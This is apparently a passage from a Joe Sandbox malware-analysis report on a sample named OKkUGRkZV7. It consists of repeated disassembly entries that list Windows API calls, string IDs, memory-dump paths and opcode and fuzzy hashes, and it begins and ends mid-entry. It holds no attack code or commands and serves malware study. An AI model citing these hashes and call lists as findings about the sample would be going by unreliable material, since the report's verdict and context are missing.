                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: f373ef26e97f6374550ca042b9cce745b4251c8db1a278ae499aa1b01774a060
                                              • Instruction ID: c738f77436d9784bfa7bed5624420db3ce1830c5826191a85455ed0f702ec67d
                                              • Opcode Fuzzy Hash: f373ef26e97f6374550ca042b9cce745b4251c8db1a278ae499aa1b01774a060
                                              • Instruction Fuzzy Hash: 415156724087449BD321EF14D886BAFBBECFF85340F42885DF2D8491A1DB309568CB66
                                              APIs
                                                • Part of subcall function 00344F0B: __fread_nolock.LIBCMT ref: 00344F29
                                              • _wcscmp.LIBCMT ref: 003A9824
                                              • _wcscmp.LIBCMT ref: 003A9837
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 681c06df677f1ca07e1a55f5521d20a932e8b5c3d74b93f04d96132b06f1db21
                                              • Instruction ID: 7be5b47c8076aed76a3bfe2899b4ab892e811eafab20ac1fe8bf1a3bfa6fa4b2
                                              • Opcode Fuzzy Hash: 681c06df677f1ca07e1a55f5521d20a932e8b5c3d74b93f04d96132b06f1db21
                                              • Instruction Fuzzy Hash: BB41B671A00209BADF229AA1CC45FEFB7FDDF86710F01447AF904BF181DA75A9048B61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID: Dd@$Dd@
                                              • API String ID: 1473721057-3375393111
                                              • Opcode ID: 465c38df6d7f38610c92827cd3b99daa6c6aca72110f463a77fa5bce2f9e1947
                                              • Instruction ID: 82a6e0fc1be4b1297cda5d46830dbfd0139722c9f7740bf13c73f67e6da5184a
                                              • Opcode Fuzzy Hash: 465c38df6d7f38610c92827cd3b99daa6c6aca72110f463a77fa5bce2f9e1947
                                              • Instruction Fuzzy Hash: 205110786087018FD796DF18C580A1ABBF1FB88344F56886DF9868B321E331E885CF42
                                              APIs
                                              • _memset.LIBCMT ref: 003B259E
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003B25D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: f7c36077387d65ea4cc9bcdd4501fea322f0d562f2d4a3308c8883e5a3ba6687
                                              • Instruction ID: 8d61da684235376ecf14f7ad134197e3e980e90a28f8568efc54656d88a1ab5c
                                              • Opcode Fuzzy Hash: f7c36077387d65ea4cc9bcdd4501fea322f0d562f2d4a3308c8883e5a3ba6687
                                              • Instruction Fuzzy Hash: F8312871800119ABCF02EFA1CC85EEFBFB8FF08350F104159F954AA162EB316956DB60
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C7B61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C7B76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: c28987faab0994beae231b40b29dd8383d792b8b052982a09796542b128ed5de
                                              • Instruction ID: df0b653b2632e66034f69cdacd122564b38b5547333f853cdd0b0fa448c25a6e
                                              • Opcode Fuzzy Hash: c28987faab0994beae231b40b29dd8383d792b8b052982a09796542b128ed5de
                                              • Instruction Fuzzy Hash: 9541D175A0520A9FDB15CF68C981BEABBB9FB08300F11416AED04EB391D771AD51CF90
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 003C6B17
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003C6B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: d15c561571bdf025e246b11b5984ac9c5ab610552f216114f417587dde239f7d
                                              • Instruction ID: 1bed7742868e5b2c53d68a0927d3d1aecccbf4a6b07b3eb1ef302fa0bd386d91
                                              • Opcode Fuzzy Hash: d15c561571bdf025e246b11b5984ac9c5ab610552f216114f417587dde239f7d
                                              • Instruction Fuzzy Hash: D4316D71200604AEDB129F69CC81FFB77A9FF48760F11862DF9A5D7190DA31AC91DB60
                                              APIs
                                              • _memset.LIBCMT ref: 003A2911
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A294C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 64df23767e956f4574f858fea7c8ff06a788bf1d982e3b78acfd99780cf9596e
                                              • Instruction ID: 54fa2b38d5ad447a74ba631328609461c26903398d0540ee2c7ac1360d1f8cf7
                                              • Opcode Fuzzy Hash: 64df23767e956f4574f858fea7c8ff06a788bf1d982e3b78acfd99780cf9596e
                                              • Instruction Fuzzy Hash: 2B31D2316003059FEB2ACF5CC985BAFBBB8EF46750F16402DED85A61A0D7709950CB51
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003C6761
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C676C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 457fb3212a4725a88872a53a5a3bd93e1380f241d6b7f954f4126e78f6966c4f
                                              • Instruction ID: 506a88109be025acad1ebb49a788e79ec9f90e599ea782a86393b112e30047c8
                                              • Opcode Fuzzy Hash: 457fb3212a4725a88872a53a5a3bd93e1380f241d6b7f954f4126e78f6966c4f
                                              • Instruction Fuzzy Hash: B9118275200208AFEF129F54CC82FBB376EEB49368F114529F918DB290D671DC6197A0
                                              APIs
                                                • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                              • GetWindowRect.USER32(00000000,?), ref: 003C6C71
                                              • GetSysColor.USER32(00000012), ref: 003C6C8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 6bbe52668395424420c18331e15e14fc05b355bcf13eabffad42b7b2e3f06c8c
                                              • Instruction ID: 9d76210e46b663cd7337f99791dc1dcf9c2e5d41dc005d9cb0524b2db0899e72
                                              • Opcode Fuzzy Hash: 6bbe52668395424420c18331e15e14fc05b355bcf13eabffad42b7b2e3f06c8c
                                              • Instruction Fuzzy Hash: A1212672610209AFDF05DFA8CC46EFABBA9FB08314F014629F995E3250D735E861DB60
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 003C69A2
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003C69B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 998db419e309890ac8c1923c170d30abe43541508cff26a811bb5e8f0b3aa9db
                                              • Instruction ID: 68b76061a255337e7638ab014f982b304344d9eb4277ead5253e1476b428f434
                                              • Opcode Fuzzy Hash: 998db419e309890ac8c1923c170d30abe43541508cff26a811bb5e8f0b3aa9db
                                              • Instruction Fuzzy Hash: 1A116D71500108AFEB128E649C42FEB37AEEB06374F514728F9A5D71E0C731DC519B60
                                              APIs
                                              • _memset.LIBCMT ref: 003A2A22
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003A2A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                              • Instruction ID: 82da25bc5107b24b945dc27eb6d68c4b95c9902ba54cb387b128e7ea94549b24
                                              • Opcode Fuzzy Hash: 376f28375461beada461217a9c0b70498487ec6b5c2d0bad02dfbb455dbec53e
                                              • Instruction Fuzzy Hash: 1111D032A05114AFCF32DB9CD844BAB73B8EB47300F064021E855E7290DB30AD0ACB91
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003B222C
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003B2255
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                              • Instruction ID: 8595a4dc15c6824eb53a9083ba81d09e208c5b33a0109ec61f775937f94ec461
                                              • Opcode Fuzzy Hash: 31a55a0b810022c35ad3e43d0f449c845b1d4e5811c2ca29f11e6533597b597e
                                              • Instruction Fuzzy Hash: A811A370541225BEDB268F518C84EF7FBACFF16759F108B2AFA159A800D2705950D6F0
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C14,004052F8,?,?,?), ref: 0035096E
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • _wcscat.LIBCMT ref: 00384CB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FullNamePath_memmove_wcscat
                                              • String ID: S@
                                              • API String ID: 257928180-58448795
                                              • Opcode ID: a05a2e77c3dc69690d4af89942311c734ac77e723f5e07d7a2826b1296759a8d
                                              • Instruction ID: 2aebc0e7340791652904dbcb2209b2da4999ae27659a8043472229e4d5cbbb56
                                              • Opcode Fuzzy Hash: a05a2e77c3dc69690d4af89942311c734ac77e723f5e07d7a2826b1296759a8d
                                              • Instruction Fuzzy Hash: 1511A531905209AACB47FB64C806EDE77F8FF09341B0084A6BD48EB1A5EB71A7884B15
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00398E73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: c860a605b9c1cb9a16c737d1a89a6e7f57c17f73dd51cc81401d3b4453acb286
                                              • Instruction ID: 81b743ac30ee8bfeed689724f1f616d5e440b5dbfcfc2675d840408a48de711a
                                              • Opcode Fuzzy Hash: c860a605b9c1cb9a16c737d1a89a6e7f57c17f73dd51cc81401d3b4453acb286
                                              • Instruction Fuzzy Hash: D701B571E15619AB8F16EBA4CC568FE73A9AF46360B140A19F8215B3D2DF316808D690
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00398D6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 8e379beea8593c88c5ae51206a45ec2ddaa9f21ec431a580711765e516e5b9ba
                                              • Instruction ID: 40fc934742fc500817c86a8bded2fb7d38f9c34cdcc8c0540f2254111f24cf81
                                              • Opcode Fuzzy Hash: 8e379beea8593c88c5ae51206a45ec2ddaa9f21ec431a580711765e516e5b9ba
                                              • Instruction Fuzzy Hash: 6201F7B1A41509ABDF17EBE0C952EFE73ACDF56340F100019B8016B2D2DF106E08D2B1
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                                • Part of subcall function 0039AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0039AABC
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00398DEE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 2bd916b9c3d85987c274d38dd65e2ca5ab51d4ab4f6eff49e84c7bf123f97572
                                              • Instruction ID: 2392b70bfa25e56aa756c40588b370fd5ee44a0263ebcc13a53e24f1e258196f
                                              • Opcode Fuzzy Hash: 2bd916b9c3d85987c274d38dd65e2ca5ab51d4ab4f6eff49e84c7bf123f97572
                                              • Instruction Fuzzy Hash: 2F01A272A55509ABDF13EBA4C952EFE77AC9F16340F100015F805AB292DE259E18D2B1
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 0039C534
                                                • Part of subcall function 0039C816: _memmove.LIBCMT ref: 0039C860
                                                • Part of subcall function 0039C816: VariantInit.OLEAUT32(00000000), ref: 0039C882
                                                • Part of subcall function 0039C816: VariantCopy.OLEAUT32(00000000,?), ref: 0039C88C
                                              • VariantClear.OLEAUT32(?), ref: 0039C556
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$Init$ClearCopy_memmove
                                              • String ID: d}?
                                              • API String ID: 2932060187-2624098408
                                              • Opcode ID: b7e4d1a84f31824c4c701caf3599513dad4e75811dfa2729b886ccc9b2cd4f92
                                              • Instruction ID: 6e4c08883328d429486a9c097be3bee68a8ef58cfd976e454a9b4268ef63315a
                                              • Opcode Fuzzy Hash: b7e4d1a84f31824c4c701caf3599513dad4e75811dfa2729b886ccc9b2cd4f92
                                              • Instruction Fuzzy Hash: B01100719007089FC711DF9AD88499BF7F8FF08310B50852FE58AD7611D771AA44CB50
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: ed00dc63669f5b474b4598915d18f3546a17162a6318e64bc3b6fe683df4bb5c
                                              • Instruction ID: fbc6f645bdf4ab3b6dc422180f570bcc79c145ac1ac5ce7bb71d407ad42d2763
                                              • Opcode Fuzzy Hash: ed00dc63669f5b474b4598915d18f3546a17162a6318e64bc3b6fe683df4bb5c
                                              • Instruction Fuzzy Hash: 65E0D13350422C2BD7119755AC45FA7F7ECDB85B71F010067FD04D7051D5709A558BE0
                                              APIs
                                                • Part of subcall function 0037B314: _memset.LIBCMT ref: 0037B321
                                                • Part of subcall function 00360940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0037B2F0,?,?,?,0034100A), ref: 00360945
                                              • IsDebuggerPresent.KERNEL32(?,?,?,0034100A), ref: 0037B2F4
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0034100A), ref: 0037B303
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0037B2FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
